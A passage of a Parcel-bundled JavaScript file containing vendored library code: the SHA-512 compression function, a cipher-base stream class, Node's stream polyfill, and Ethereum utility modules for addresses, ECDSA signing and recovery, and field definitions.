function $8bb7891960962038$var$sigma1(x, xl) {
    return (x >>> 14 | xl << 18) ^ (x >>> 18 | xl << 14) ^ (xl >>> 9 | x << 23);
}
function $8bb7891960962038$var$Gamma0(x, xl) {
    return (x >>> 1 | xl << 31) ^ (x >>> 8 | xl << 24) ^ x >>> 7;
}
function $8bb7891960962038$var$Gamma0l(x, xl) {
    return (x >>> 1 | xl << 31) ^ (x >>> 8 | xl << 24) ^ (x >>> 7 | xl << 25);
}
function $8bb7891960962038$var$Gamma1(x, xl) {
    return (x >>> 19 | xl << 13) ^ (xl >>> 29 | x << 3) ^ x >>> 6;
}
function $8bb7891960962038$var$Gamma1l(x, xl) {
    return (x >>> 19 | xl << 13) ^ (xl >>> 29 | x << 3) ^ (x >>> 6 | xl << 26);
}
function $8bb7891960962038$var$getCarry(a, b) {
    return a >>> 0 < b >>> 0 ? 1 : 0;
}
$8bb7891960962038$var$Sha512.prototype._update = function(M) {
    var W = this._w;
    var ah = this._ah | 0;
    var bh = this._bh | 0;
    var ch = this._ch | 0;
    var dh = this._dh | 0;
    var eh = this._eh | 0;
    var fh = this._fh | 0;
    var gh = this._gh | 0;
    var hh = this._hh | 0;
    var al = this._al | 0;
    var bl = this._bl | 0;
    var cl = this._cl | 0;
    var dl = this._dl | 0;
    var el = this._el | 0;
    var fl = this._fl | 0;
    var gl = this._gl | 0;
    var hl = this._hl | 0;
    for(var i = 0; i < 32; i += 2){
        W[i] = M.readInt32BE(i * 4);
        W[i + 1] = M.readInt32BE(i * 4 + 4);
    }
    for(; i < 160; i += 2){
        var xh = W[i - 30];
        var xl = W[i - 30 + 1];
        var gamma0 = $8bb7891960962038$var$Gamma0(xh, xl);
        var gamma0l = $8bb7891960962038$var$Gamma0l(xl, xh);
        xh = W[i - 4];
        xl = W[i - 4 + 1];
        var gamma1 = $8bb7891960962038$var$Gamma1(xh, xl);
        var gamma1l = $8bb7891960962038$var$Gamma1l(xl, xh);
        // W[i] = gamma0 + W[i - 7] + gamma1 + W[i - 16]
        var Wi7h = W[i - 14];
        var Wi7l = W[i - 14 + 1];
        var Wi16h = W[i - 32];
        var Wi16l = W[i - 32 + 1];
        var Wil = gamma0l + Wi7l | 0;
        var Wih = gamma0 + Wi7h + $8bb7891960962038$var$getCarry(Wil, gamma0l) | 0;
        Wil = Wil + gamma1l | 0;
        Wih = Wih + gamma1 + $8bb7891960962038$var$getCarry(Wil, gamma1l) | 0;
        Wil = Wil + Wi16l | 0;
        Wih = Wih + Wi16h + $8bb7891960962038$var$getCarry(Wil, Wi16l) | 0;
        W[i] = Wih;
        W[i + 1] = Wil;
    }
    for(var j = 0; j < 160; j += 2){
        Wih = W[j];
        Wil = W[j + 1];
        var majh = $8bb7891960962038$var$maj(ah, bh, ch);
        var majl = $8bb7891960962038$var$maj(al, bl, cl);
        var sigma0h = $8bb7891960962038$var$sigma0(ah, al);
        var sigma0l = $8bb7891960962038$var$sigma0(al, ah);
        var sigma1h = $8bb7891960962038$var$sigma1(eh, el);
        var sigma1l = $8bb7891960962038$var$sigma1(el, eh);
        // t1 = h + sigma1 + ch + K[j] + W[j]
        var Kih = $8bb7891960962038$var$K[j];
        var Kil = $8bb7891960962038$var$K[j + 1];
        var chh = $8bb7891960962038$var$Ch(eh, fh, gh);
        var chl = $8bb7891960962038$var$Ch(el, fl, gl);
        var t1l = hl + sigma1l | 0;
        var t1h = hh + sigma1h + $8bb7891960962038$var$getCarry(t1l, hl) | 0;
        t1l = t1l + chl | 0;
        t1h = t1h + chh + $8bb7891960962038$var$getCarry(t1l, chl) | 0;
        t1l = t1l + Kil | 0;
        t1h = t1h + Kih + $8bb7891960962038$var$getCarry(t1l, Kil) | 0;
        t1l = t1l + Wil | 0;
        t1h = t1h + Wih + $8bb7891960962038$var$getCarry(t1l, Wil) | 0;
        // t2 = sigma0 + maj
        var t2l = sigma0l + majl | 0;
        var t2h = sigma0h + majh + $8bb7891960962038$var$getCarry(t2l, sigma0l) | 0;
        hh = gh;
        hl = gl;
        gh = fh;
        gl = fl;
        fh = eh;
        fl = el;
        el = dl + t1l | 0;
        eh = dh + t1h + $8bb7891960962038$var$getCarry(el, dl) | 0;
        dh = ch;
        dl = cl;
        ch = bh;
        cl = bl;
        bh = ah;
        bl = al;
        al = t1l + t2l | 0;
        ah = t1h + t2h + $8bb7891960962038$var$getCarry(al, t1l) | 0;
    }
    this._al = this._al + al | 0;
    this._bl = this._bl + bl | 0;
    this._cl = this._cl + cl | 0;
    this._dl = this._dl + dl | 0;
    this._el = this._el + el | 0;
    this._fl = this._fl + fl | 0;
    this._gl = this._gl + gl | 0;
    this._hl = this._hl + hl | 0;
    this._ah = this._ah + ah + $8bb7891960962038$var$getCarry(this._al, al) | 0;
    this._bh = this._bh + bh + $8bb7891960962038$var$getCarry(this._bl, bl) | 0;
    this._ch = this._ch + ch + $8bb7891960962038$var$getCarry(this._cl, cl) | 0;
    this._dh = this._dh + dh + $8bb7891960962038$var$getCarry(this._dl, dl) | 0;
    this._eh = this._eh + eh + $8bb7891960962038$var$getCarry(this._el, el) | 0;
    this._fh = this._fh + fh + $8bb7891960962038$var$getCarry(this._fl, fl) | 0;
    this._gh = this._gh + gh + $8bb7891960962038$var$getCarry(this._gl, gl) | 0;
    this._hh = this._hh + hh + $8bb7891960962038$var$getCarry(this._hl, hl) | 0;
};
$8bb7891960962038$var$Sha512.prototype._hash = function() {
    var H = $8bb7891960962038$require$Buffer.allocUnsafe(64);
    function writeInt64BE(h, l, offset) {
        H.writeInt32BE(h, offset);
        H.writeInt32BE(l, offset + 4);
    }
    writeInt64BE(this._ah, this._al, 0);
    writeInt64BE(this._bh, this._bl, 8);
    writeInt64BE(this._ch, this._cl, 16);
    writeInt64BE(this._dh, this._dl, 24);
    writeInt64BE(this._eh, this._el, 32);
    writeInt64BE(this._fh, this._fl, 40);
    writeInt64BE(this._gh, this._gl, 48);
    writeInt64BE(this._hh, this._hl, 56);
    return H;
};
module.exports = $8bb7891960962038$var$Sha512;

});



parcelRequire.register("26nOC", function(module, exports) {

var $1U9GM = parcelRequire("1U9GM");
var $187e9d8dfda3dbba$require$Buffer = $1U9GM.Buffer;

var $ioRHp = parcelRequire("ioRHp");
var $187e9d8dfda3dbba$require$Transform = $ioRHp.Transform;

var $eNRCS = parcelRequire("eNRCS");
var $187e9d8dfda3dbba$require$StringDecoder = $eNRCS.StringDecoder;

var $dlqwk = parcelRequire("dlqwk");
function $187e9d8dfda3dbba$var$CipherBase(hashMode) {
    $187e9d8dfda3dbba$require$Transform.call(this);
    this.hashMode = typeof hashMode === "string";
    if (this.hashMode) this[hashMode] = this._finalOrDigest;
    else this.final = this._finalOrDigest;
    if (this._final) {
        this.__final = this._final;
        this._final = null;
    }
    this._decoder = null;
    this._encoding = null;
}
$dlqwk($187e9d8dfda3dbba$var$CipherBase, $187e9d8dfda3dbba$require$Transform);
$187e9d8dfda3dbba$var$CipherBase.prototype.update = function(data, inputEnc, outputEnc) {
    if (typeof data === "string") data = $187e9d8dfda3dbba$require$Buffer.from(data, inputEnc);
    var outData = this._update(data);
    if (this.hashMode) return this;
    if (outputEnc) outData = this._toString(outData, outputEnc);
    return outData;
};
$187e9d8dfda3dbba$var$CipherBase.prototype.setAutoPadding = function() {};
$187e9d8dfda3dbba$var$CipherBase.prototype.getAuthTag = function() {
    throw new Error("trying to get auth tag in unsupported state");
};
$187e9d8dfda3dbba$var$CipherBase.prototype.setAuthTag = function() {
    throw new Error("trying to set auth tag in unsupported state");
};
$187e9d8dfda3dbba$var$CipherBase.prototype.setAAD = function() {
    throw new Error("trying to set aad in unsupported state");
};
$187e9d8dfda3dbba$var$CipherBase.prototype._transform = function(data, _, next) {
    var err;
    try {
        if (this.hashMode) this._update(data);
        else this.push(this._update(data));
    } catch (e) {
        err = e;
    } finally{
        next(err);
    }
};
$187e9d8dfda3dbba$var$CipherBase.prototype._flush = function(done) {
    var err;
    try {
        this.push(this.__final());
    } catch (e) {
        err = e;
    }
    done(err);
};
$187e9d8dfda3dbba$var$CipherBase.prototype._finalOrDigest = function(outputEnc) {
    var outData = this.__final() || $187e9d8dfda3dbba$require$Buffer.alloc(0);
    if (outputEnc) outData = this._toString(outData, outputEnc, true);
    return outData;
};
$187e9d8dfda3dbba$var$CipherBase.prototype._toString = function(value, enc, fin) {
    if (!this._decoder) {
        this._decoder = new $187e9d8dfda3dbba$require$StringDecoder(enc);
        this._encoding = enc;
    }
    if (this._encoding !== enc) throw new Error("can't switch encodings");
    var out = this._decoder.write(value);
    if (fin) out += this._decoder.end();
    return out;
};
module.exports = $187e9d8dfda3dbba$var$CipherBase;

});
parcelRequire.register("ioRHp", function(module, exports) {
// Copyright Joyent, Inc. and other Node contributors.
//
// Permission is hereby granted, free of charge, to any person obtaining a
// copy of this software and associated documentation files (the
// "Software"), to deal in the Software without restriction, including
// without limitation the rights to use, copy, modify, merge, publish,
// distribute, sublicense, and/or sell copies of the Software, and to permit
// persons to whom the Software is furnished to do so, subject to the
// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
module.exports = $d6541f691ffb0af6$var$Stream;

var $7etJZ = parcelRequire("7etJZ");
var $d6541f691ffb0af6$require$EE = $7etJZ.EventEmitter;

var $dlqwk = parcelRequire("dlqwk");
$dlqwk($d6541f691ffb0af6$var$Stream, $d6541f691ffb0af6$require$EE);

$d6541f691ffb0af6$var$Stream.Readable = (parcelRequire("d4xg3"));

$d6541f691ffb0af6$var$Stream.Writable = (parcelRequire("3LwY7"));

$d6541f691ffb0af6$var$Stream.Duplex = (parcelRequire("DwJuQ"));

$d6541f691ffb0af6$var$Stream.Transform = (parcelRequire("b7kl8"));

$d6541f691ffb0af6$var$Stream.PassThrough = (parcelRequire("4wWcs"));

$d6541f691ffb0af6$var$Stream.finished = (parcelRequire("fiCvv"));

$d6541f691ffb0af6$var$Stream.pipeline = (parcelRequire("aGSwO"));
// Backwards-compat with node 0.4.x
$d6541f691ffb0af6$var$Stream.Stream = $d6541f691ffb0af6$var$Stream;
// old-style streams.  Note that the pipe method (the only relevant
// part of this class) is overridden in the Readable class.
function $d6541f691ffb0af6$var$Stream() {
    $d6541f691ffb0af6$require$EE.call(this);
}
$d6541f691ffb0af6$var$Stream.prototype.pipe = function(dest, options) {
    var source = this;
    function ondata(chunk) {
        if (dest.writable) {
            if (false === dest.write(chunk) && source.pause) source.pause();
        }
    }
    source.on("data", ondata);
    function ondrain() {
        if (source.readable && source.resume) source.resume();
    }
    dest.on("drain", ondrain);
    // If the 'end' option is not supplied, dest.end() will be called when
    // source gets the 'end' or 'close' events.  Only dest.end() once.
    if (!dest._isStdio && (!options || options.end !== false)) {
        source.on("end", onend);
        source.on("close", onclose);
    }
    var didOnEnd = false;
    function onend() {
        if (didOnEnd) return;
        didOnEnd = true;
        dest.end();
    }
    function onclose() {
        if (didOnEnd) return;
        didOnEnd = true;
        if (typeof dest.destroy === "function") dest.destroy();
    }
    // don't leave dangling pipes when there are errors.
    function onerror(er) {
        cleanup();
        if ($d6541f691ffb0af6$require$EE.listenerCount(this, "error") === 0) throw er; // Unhandled stream error in pipe.
    }
    source.on("error", onerror);
    dest.on("error", onerror);
    // remove all the event listeners that were added.
    function cleanup() {
        source.removeListener("data", ondata);
        dest.removeListener("drain", ondrain);
        source.removeListener("end", onend);
        source.removeListener("close", onclose);
        source.removeListener("error", onerror);
        dest.removeListener("error", onerror);
        source.removeListener("end", cleanup);
        source.removeListener("close", cleanup);
        dest.removeListener("close", cleanup);
    }
    source.on("end", cleanup);
    source.on("close", cleanup);
    dest.on("close", cleanup);
    dest.emit("pipe", source);
    // Allow for unix-like usage: A.pipe(B).pipe(C)
    return dest;
};

});




parcelRequire.register("eLj8Y", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $abf44dff9428eb2b$require$Buffer = $6ZWSX.Buffer;
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.toType = module.exports.TypeOutput = module.exports.bnToRlp = module.exports.bnToUnpaddedBuffer = module.exports.bnToHex = void 0;

var $4jhio = parcelRequire("4jhio");

var $aj8Qm = parcelRequire("aj8Qm");

var $b61lJ = parcelRequire("b61lJ");
/**
 * Convert BN to 0x-prefixed hex string.
 */ function $abf44dff9428eb2b$var$bnToHex(value) {
    return "0x".concat(value.toString(16));
}
module.exports.bnToHex = $abf44dff9428eb2b$var$bnToHex;
/**
 * Convert value from BN to an unpadded Buffer
 * (useful for RLP transport)
 * @param value value to convert
 */ function $abf44dff9428eb2b$var$bnToUnpaddedBuffer(value) {
    // Using `bn.toArrayLike(Buffer)` instead of `bn.toBuffer()`
    // for compatibility with browserify and similar tools
    return (0, $b61lJ.unpadBuffer)(value.toArrayLike($abf44dff9428eb2b$require$Buffer));
}
module.exports.bnToUnpaddedBuffer = $abf44dff9428eb2b$var$bnToUnpaddedBuffer;
/**
 * Deprecated alias for {@link bnToUnpaddedBuffer}
 * @deprecated
 */ function $abf44dff9428eb2b$var$bnToRlp(value) {
    return $abf44dff9428eb2b$var$bnToUnpaddedBuffer(value);
}
module.exports.bnToRlp = $abf44dff9428eb2b$var$bnToRlp;
/**
 * Type output options
 */ var $abf44dff9428eb2b$var$TypeOutput;
(function(TypeOutput) {
    TypeOutput[TypeOutput["Number"] = 0] = "Number";
    TypeOutput[TypeOutput["BN"] = 1] = "BN";
    TypeOutput[TypeOutput["Buffer"] = 2] = "Buffer";
    TypeOutput[TypeOutput["PrefixedHexString"] = 3] = "PrefixedHexString";
})($abf44dff9428eb2b$var$TypeOutput = module.exports.TypeOutput || (module.exports.TypeOutput = {}));
function $abf44dff9428eb2b$var$toType(input, outputType) {
    if (input === null) return null;
    if (input === undefined) return undefined;
    if (typeof input === "string" && !(0, $aj8Qm.isHexString)(input)) throw new Error("A string must be provided with a 0x-prefix, given: ".concat(input));
    else if (typeof input === "number" && !Number.isSafeInteger(input)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative input type)");
    var output = (0, $b61lJ.toBuffer)(input);
    if (outputType === $abf44dff9428eb2b$var$TypeOutput.Buffer) return output;
    else if (outputType === $abf44dff9428eb2b$var$TypeOutput.BN) return new $4jhio.BN(output);
    else if (outputType === $abf44dff9428eb2b$var$TypeOutput.Number) {
        var bn = new $4jhio.BN(output);
        var max = new $4jhio.BN(Number.MAX_SAFE_INTEGER.toString());
        if (bn.gt(max)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative output type)");
        return bn.toNumber();
    } else // outputType === TypeOutput.PrefixedHexString
    return "0x".concat(output.toString("hex"));
}
module.exports.toType = $abf44dff9428eb2b$var$toType;

});


parcelRequire.register("aSXhg", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $7eccedcfb056007a$require$Buffer = $6ZWSX.Buffer;
"use strict";
var $7eccedcfb056007a$var$__importDefault = module.exports && module.exports.__importDefault || function(mod) {
    return mod && mod.__esModule ? mod : {
        "default": mod
    };
};
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.Address = void 0;

var $7eccedcfb056007a$var$assert_1 = $7eccedcfb056007a$var$__importDefault((parcelRequire("aLUwE")));

var $4jhio = parcelRequire("4jhio");

var $b61lJ = parcelRequire("b61lJ");

var $idiNS = parcelRequire("idiNS");
var $7eccedcfb056007a$var$Address = /** @class */ function() {
    function Address(buf) {
        (0, $7eccedcfb056007a$var$assert_1.default)(buf.length === 20, "Invalid address length");
        this.buf = buf;
    }
    /**
     * Returns the zero address.
     */ Address.zero = function() {
        return new Address((0, $b61lJ.zeros)(20));
    };
    /**
     * Returns an Address object from a hex-encoded string.
     * @param str - Hex-encoded address
     */ Address.fromString = function(str) {
        (0, $7eccedcfb056007a$var$assert_1.default)((0, $idiNS.isValidAddress)(str), "Invalid address");
        return new Address((0, $b61lJ.toBuffer)(str));
    };
    /**
     * Returns an address for a given public key.
     * @param pubKey The two points of an uncompressed key
     */ Address.fromPublicKey = function(pubKey) {
        (0, $7eccedcfb056007a$var$assert_1.default)($7eccedcfb056007a$require$Buffer.isBuffer(pubKey), "Public key should be Buffer");
        var buf = (0, $idiNS.pubToAddress)(pubKey);
        return new Address(buf);
    };
    /**
     * Returns an address for a given private key.
     * @param privateKey A private key must be 256 bits wide
     */ Address.fromPrivateKey = function(privateKey) {
        (0, $7eccedcfb056007a$var$assert_1.default)($7eccedcfb056007a$require$Buffer.isBuffer(privateKey), "Private key should be Buffer");
        var buf = (0, $idiNS.privateToAddress)(privateKey);
        return new Address(buf);
    };
    /**
     * Generates an address for a newly created contract.
     * @param from The address which is creating this new address
     * @param nonce The nonce of the from account
     */ Address.generate = function(from, nonce) {
        (0, $7eccedcfb056007a$var$assert_1.default)($4jhio.BN.isBN(nonce));
        return new Address((0, $idiNS.generateAddress)(from.buf, nonce.toArrayLike($7eccedcfb056007a$require$Buffer)));
    };
    /**
     * Generates an address for a contract created using CREATE2.
     * @param from The address which is creating this new address
     * @param salt A salt
     * @param initCode The init code of the contract being created
     */ Address.generate2 = function(from, salt, initCode) {
        (0, $7eccedcfb056007a$var$assert_1.default)($7eccedcfb056007a$require$Buffer.isBuffer(salt));
        (0, $7eccedcfb056007a$var$assert_1.default)($7eccedcfb056007a$require$Buffer.isBuffer(initCode));
        return new Address((0, $idiNS.generateAddress2)(from.buf, salt, initCode));
    };
    /**
     * Is address equal to another.
     */ Address.prototype.equals = function(address) {
        return this.buf.equals(address.buf);
    };
    /**
     * Is address zero.
     */ Address.prototype.isZero = function() {
        return this.equals(Address.zero());
    };
    /**
     * True if address is in the address range defined
     * by EIP-1352
     */ Address.prototype.isPrecompileOrSystemAddress = function() {
        var addressBN = new $4jhio.BN(this.buf);
        var rangeMin = new $4jhio.BN(0);
        var rangeMax = new $4jhio.BN("ffff", "hex");
        return addressBN.gte(rangeMin) && addressBN.lte(rangeMax);
    };
    /**
     * Returns hex encoding of address.
     */ Address.prototype.toString = function() {
        return "0x" + this.buf.toString("hex");
    };
    /**
     * Returns Buffer representation of address.
     */ Address.prototype.toBuffer = function() {
        return $7eccedcfb056007a$require$Buffer.from(this.buf);
    };
    return Address;
}();
module.exports.Address = $7eccedcfb056007a$var$Address;

});

parcelRequire.register("67JT1", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $4756fda0b84972b4$require$Buffer = $6ZWSX.Buffer;
"use strict";
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.hashPersonalMessage = module.exports.isValidSignature = module.exports.fromRpcSig = module.exports.toCompactSig = module.exports.toRpcSig = module.exports.ecrecover = module.exports.ecsign = void 0;

var $dXQCW = parcelRequire("dXQCW");

var $4jhio = parcelRequire("4jhio");

var $b61lJ = parcelRequire("b61lJ");

var $gKSHR = parcelRequire("gKSHR");

var $7jIKp = parcelRequire("7jIKp");

var $eLj8Y = parcelRequire("eLj8Y");
function $4756fda0b84972b4$var$ecsign(msgHash, privateKey, chainId) {
    var _a = (0, $dXQCW.ecdsaSign)(msgHash, privateKey), signature = _a.signature, recovery = _a.recid;
    var r = $4756fda0b84972b4$require$Buffer.from(signature.slice(0, 32));
    var s = $4756fda0b84972b4$require$Buffer.from(signature.slice(32, 64));
    if (!chainId || typeof chainId === "number") {
        // return legacy type ECDSASignature (deprecated in favor of ECDSASignatureBuffer to handle large chainIds)
        if (chainId && !Number.isSafeInteger(chainId)) throw new Error("The provided number is greater than MAX_SAFE_INTEGER (please use an alternative input type)");
        var v_1 = chainId ? recovery + (chainId * 2 + 35) : recovery + 27;
        return {
            r: r,
            s: s,
            v: v_1
        };
    }
    var chainIdBN = (0, $eLj8Y.toType)(chainId, $eLj8Y.TypeOutput.BN);
    var v = chainIdBN.muln(2).addn(35).addn(recovery).toArrayLike($4756fda0b84972b4$require$Buffer);
    return {
        r: r,
        s: s,
        v: v
    };
}
module.exports.ecsign = $4756fda0b84972b4$var$ecsign;
function $4756fda0b84972b4$var$calculateSigRecovery(v, chainId) {
    var vBN = (0, $eLj8Y.toType)(v, $eLj8Y.TypeOutput.BN);
    if (vBN.eqn(0) || vBN.eqn(1)) return (0, $eLj8Y.toType)(v, $eLj8Y.TypeOutput.BN);
    if (!chainId) return vBN.subn(27);
    var chainIdBN = (0, $eLj8Y.toType)(chainId, $eLj8Y.TypeOutput.BN);
    return vBN.sub(chainIdBN.muln(2).addn(35));
}
function $4756fda0b84972b4$var$isValidSigRecovery(recovery) {
    var rec = new $4jhio.BN(recovery);
    return rec.eqn(0) || rec.eqn(1);
}
/**
 * ECDSA public key recovery from signature.
 * NOTE: Accepts `v == 0 | v == 1` for EIP1559 transactions
 * @returns Recovered public key
 */ var $4756fda0b84972b4$var$ecrecover = function(msgHash, v, r, s, chainId) {
    var signature = $4756fda0b84972b4$require$Buffer.concat([
        (0, $b61lJ.setLengthLeft)(r, 32),
        (0, $b61lJ.setLengthLeft)(s, 32)
    ], 64);
    var recovery = $4756fda0b84972b4$var$calculateSigRecovery(v, chainId);
    if (!$4756fda0b84972b4$var$isValidSigRecovery(recovery)) throw new Error("Invalid signature v value");
    var senderPubKey = (0, $dXQCW.ecdsaRecover)(signature, recovery.toNumber(), msgHash);
    return $4756fda0b84972b4$require$Buffer.from((0, $dXQCW.publicKeyConvert)(senderPubKey, false).slice(1));
};
module.exports.ecrecover = $4756fda0b84972b4$var$ecrecover;
/**
 * Convert signature parameters into the format of `eth_sign` RPC method.
 * NOTE: Accepts `v == 0 | v == 1` for EIP1559 transactions
 * @returns Signature
 */ var $4756fda0b84972b4$var$toRpcSig = function(v, r, s, chainId) {
    var recovery = $4756fda0b84972b4$var$calculateSigRecovery(v, chainId);
    if (!$4756fda0b84972b4$var$isValidSigRecovery(recovery)) throw new Error("Invalid signature v value");
    // geth (and the RPC eth_sign method) uses the 65 byte format used by Bitcoin
    return (0, $b61lJ.bufferToHex)($4756fda0b84972b4$require$Buffer.concat([
        (0, $b61lJ.setLengthLeft)(r, 32),
        (0, $b61lJ.setLengthLeft)(s, 32),
        (0, $b61lJ.toBuffer)(v)
    ]));
};
module.exports.toRpcSig = $4756fda0b84972b4$var$toRpcSig;
/**
 * Convert signature parameters into the format of Compact Signature Representation (EIP-2098).
 * NOTE: Accepts `v == 0 | v == 1` for EIP1559 transactions
 * @returns Signature
 */ var $4756fda0b84972b4$var$toCompactSig = function(v, r, s, chainId) {
    var recovery = $4756fda0b84972b4$var$calculateSigRecovery(v, chainId);
    if (!$4756fda0b84972b4$var$isValidSigRecovery(recovery)) throw new Error("Invalid signature v value");
    var vn = (0, $eLj8Y.toType)(v, $eLj8Y.TypeOutput.Number);
    var ss = s;
    if (vn > 28 && vn % 2 === 1 || vn === 1 || vn === 28) {
        ss = $4756fda0b84972b4$require$Buffer.from(s);
        ss[0] |= 0x80;
    }
    return (0, $b61lJ.bufferToHex)($4756fda0b84972b4$require$Buffer.concat([
        (0, $b61lJ.setLengthLeft)(r, 32),
        (0, $b61lJ.setLengthLeft)(ss, 32)
    ]));
};
module.exports.toCompactSig = $4756fda0b84972b4$var$toCompactSig;
/**
 * Convert signature format of the `eth_sign` RPC method to signature parameters
 * NOTE: all because of a bug in geth: https://github.com/ethereum/go-ethereum/issues/2053
 * NOTE: After EIP1559, `v` could be `0` or `1` but this function assumes
 * it's a signed message (EIP-191 or EIP-712) adding `27` at the end. Remove if needed.
 */ var $4756fda0b84972b4$var$fromRpcSig = function(sig) {
    var buf = (0, $b61lJ.toBuffer)(sig);
    var r;
    var s;
    var v;
    if (buf.length >= 65) {
        r = buf.slice(0, 32);
        s = buf.slice(32, 64);
        v = (0, $b61lJ.bufferToInt)(buf.slice(64));
    } else if (buf.length === 64) {
        // Compact Signature Representation (https://eips.ethereum.org/EIPS/eip-2098)
        r = buf.slice(0, 32);
        s = buf.slice(32, 64);
        v = (0, $b61lJ.bufferToInt)(buf.slice(32, 33)) >> 7;
        s[0] &= 0x7f;
    } else throw new Error("Invalid signature length");
    // support both versions of `eth_sign` responses
    if (v < 27) v += 27;
    return {
        v: v,
        r: r,
        s: s
    };
};
module.exports.fromRpcSig = $4756fda0b84972b4$var$fromRpcSig;
/**
 * Validate a ECDSA signature.
 * NOTE: Accepts `v == 0 | v == 1` for EIP1559 transactions
 * @param homesteadOrLater Indicates whether this is being used on either the homestead hardfork or a later one
 */ var $4756fda0b84972b4$var$isValidSignature = function(v, r, s, homesteadOrLater, chainId) {
    if (homesteadOrLater === void 0) homesteadOrLater = true;
    var SECP256K1_N_DIV_2 = new $4jhio.BN("7fffffffffffffffffffffffffffffff5d576e7357a4501ddfe92f46681b20a0", 16);
    var SECP256K1_N = new $4jhio.BN("fffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141", 16);
    if (r.length !== 32 || s.length !== 32) return false;
    if (!$4756fda0b84972b4$var$isValidSigRecovery($4756fda0b84972b4$var$calculateSigRecovery(v, chainId))) return false;
    var rBN = new $4jhio.BN(r);
    var sBN = new $4jhio.BN(s);
    if (rBN.isZero() || rBN.gt(SECP256K1_N) || sBN.isZero() || sBN.gt(SECP256K1_N)) return false;
    if (homesteadOrLater && sBN.cmp(SECP256K1_N_DIV_2) === 1) return false;
    return true;
};
module.exports.isValidSignature = $4756fda0b84972b4$var$isValidSignature;
/**
 * Returns the keccak-256 hash of `message`, prefixed with the header used by the `eth_sign` RPC call.
 * The output of this function can be fed into `ecsign` to produce the same signature as the `eth_sign`
 * call for a given `message`, or fed to `ecrecover` along with a signature to recover the public key
 * used to produce the signature.
 */ var $4756fda0b84972b4$var$hashPersonalMessage = function(message) {
    (0, $7jIKp.assertIsBuffer)(message);
    var prefix = $4756fda0b84972b4$require$Buffer.from("\x19Ethereum Signed Message:\n".concat(message.length), "utf-8");
    return (0, $gKSHR.keccak)($4756fda0b84972b4$require$Buffer.concat([
        prefix,
        message
    ]));
};
module.exports.hashPersonalMessage = $4756fda0b84972b4$var$hashPersonalMessage;

});

parcelRequire.register("cLPFP", function(module, exports) {

var $6ZWSX = parcelRequire("6ZWSX");
var $94c1f52609770e02$require$Buffer = $6ZWSX.Buffer;
"use strict";
var $94c1f52609770e02$var$__importDefault = module.exports && module.exports.__importDefault || function(mod) {
    return mod && mod.__esModule ? mod : {
        "default": mod
    };
};
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.defineProperties = void 0;

var $94c1f52609770e02$var$assert_1 = $94c1f52609770e02$var$__importDefault((parcelRequire("aLUwE")));

var $aj8Qm = parcelRequire("aj8Qm");

var $4jhio = parcelRequire("4jhio");

var $b61lJ = parcelRequire("b61lJ");
/**
 * Defines properties on a `Object`. It make the assumption that underlying data is binary.
 * @param self the `Object` to define properties on
 * @param fields an array fields to define. Fields can contain:
 * * `name` - the name of the properties
 * * `length` - the number of bytes the field can have
 * * `allowLess` - if the field can be less than the length
 * * `allowEmpty`
 * @param data data to be validated against the definitions
 * @deprecated
 */ var $94c1f52609770e02$var$defineProperties = function(self, fields, data) {
    self.raw = [];
    self._fields = [];
    // attach the `toJSON`
    self.toJSON = function(label) {
        if (label === void 0) label = false;
        if (label) {
            var obj_1 = {};
            self._fields.forEach(function(field) {
                obj_1[field] = "0x".concat(self[field].toString("hex"));
            });
            return obj_1;
        }
        return (0, $b61lJ.baToJSON)(self.raw);
    };
    self.serialize = function serialize() {
        return $4jhio.rlp.encode(self.raw);
    };
    fields.forEach(function(field, i) {
        self._fields.push(field.name);
        function getter() {
            return self.raw[i];
        }
        function setter(v) {
            v = (0, $b61lJ.toBuffer)(v);
            if (v.toString("hex") === "00" && !field.allowZero) v = $94c1f52609770e02$require$Buffer.allocUnsafe(0);
            if (field.allowLess && field.length) {
                v = (0, $b61lJ.unpadBuffer)(v);
                (0, $94c1f52609770e02$var$assert_1.default)(field.length >= v.length, "The field ".concat(field.name, " must not have more ").concat(field.length, " bytes"));
            } else if (!(field.allowZero && v.length === 0) && field.length) (0, $94c1f52609770e02$var$assert_1.default)(field.length === v.length, "The field ".concat(field.name, " must have byte length of ").concat(field.length));
            self.raw[i] = v;
        }
        Object.defineProperty(self, field.name, {
            enumerable: true,
            configurable: true,
            get: getter,
            set: setter
        });
        if (field.default) self[field.name] = field.default;
        // attach alias
        if (field.alias) Object.defineProperty(self, field.alias, {
            enumerable: false,
            configurable: true,
            set: setter,
            get: getter
        });
    });
    // if the constuctor is passed data
    if (data) {
        if (typeof data === "string") data = $94c1f52609770e02$require$Buffer.from((0, $aj8Qm.stripHexPrefix)(data), "hex");
        if ($94c1f52609770e02$require$Buffer.isBuffer(data)) data = $4jhio.rlp.decode(data);
        if (Array.isArray(data)) {
            if (data.length > self._fields.length) throw new Error("wrong number of fields in data");
            // make sure all the items are buffers
            data.forEach(function(d, i) {
                self[self._fields[i]] = (0, $b61lJ.toBuffer)(d);
            });
        } else if (typeof data === "object") {
            var keys_1 = Object.keys(data);
            fields.forEach(function(field) {
                if (keys_1.indexOf(field.name) !== -1) self[field.name] = data[field.name];
                if (keys_1.indexOf(field.alias) !== -1) self[field.alias] = data[field.alias];
            });
        } else throw new Error("invalid data");
    }
};
